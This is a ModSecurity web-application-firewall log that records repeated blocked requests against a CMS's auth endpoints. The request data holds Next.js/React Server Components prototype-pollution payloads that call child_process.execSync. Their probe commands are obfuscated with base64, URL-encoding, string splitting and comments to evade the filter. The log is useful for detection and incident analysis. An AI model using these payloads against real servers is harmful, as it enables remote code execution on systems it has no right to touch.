[rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxTT5TgrBR8xRnfXA1QAAAUw"] [Sun Apr 05 15:42:29.417047 2026] [:error] [pid 31198:tid 31261] [client 172.94.9.253:41360] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxTT5TgrBR8xRnfXA1gAAAUk"] [Sun Apr 05 15:42:29.447593 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:41332] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxbxQSOrq_iRTM7dpEQAAARA"] [Sun Apr 05 15:42:29.456438 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:41362] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxbxQSOrq_iRTM7dpEwAAAQY"] [Sun Apr 05 15:42:29.513285 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:41374] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxZc83uMXRUE9zvQSlgAAAco"] [Sun Apr 05 15:42:29.514954 2026] [:error] [pid 1503:tid 1517] [client 172.94.9.253:41416] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxUI7AjfUQYCN-J7DZgAAAMg"] [Sun Apr 05 15:42:29.515084 2026] [:error] [pid 13019:tid 13247] [client 172.94.9.253:41436] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxbxQSOrq_iRTM7dpFgAAAQc"] [Sun Apr 05 15:42:29.515312 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:41364] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxbxQSOrq_iRTM7dpFwAAAQs"] [Sun Apr 05 15:42:29.515622 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:41398] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxUI7AjfUQYCN-J7DZQAAAMA"] [Sun Apr 05 15:42:29.516643 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:41382] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxZc83uMXRUE9zvQSlwAAAcY"] [Sun Apr 05 15:42:29.516993 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:41446] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpGgAAAQQ"] [Sun Apr 05 15:42:29.531372 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:41460] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmxbxQSOrq_iRTM7dpFQAAAQM"] [Sun Apr 05 15:42:29.531868 2026] [:error] [pid 13019:tid 13255] [client 172.94.9.253:41428] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmxbxQSOrq_iRTM7dpGAAAAQ8"] [Sun Apr 05 15:42:29.532740 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:41412] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmxbxQSOrq_iRTM7dpGQAAAQI"] [Sun Apr 05 15:42:29.862259 2026] [:error] [pid 13019:tid 13240] [client 172.94.9.253:41488] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpHwAAAQA"] [Sun Apr 05 15:42:29.879661 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:41474] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmxZc83uMXRUE9zvQSmwAAAcE"] [Sun Apr 05 15:42:29.879788 2026] [:error] [pid 1503:tid 1521] [client 172.94.9.253:41526] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxUI7AjfUQYCN-J7DaAAAAMw"] [Sun Apr 05 15:42:29.884694 2026] [:error] [pid 13019:tid 13257] [client 172.94.9.253:41560] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpIAAAARE"] [Sun Apr 05 15:42:29.901219 2026] [:error] [pid 13019:tid 13259] [client 172.94.9.253:41568] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpIQAAARM"] [Sun Apr 05 15:42:29.902411 2026] [:error] [pid 23077:tid 23095] [client 172.94.9.253:41534] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 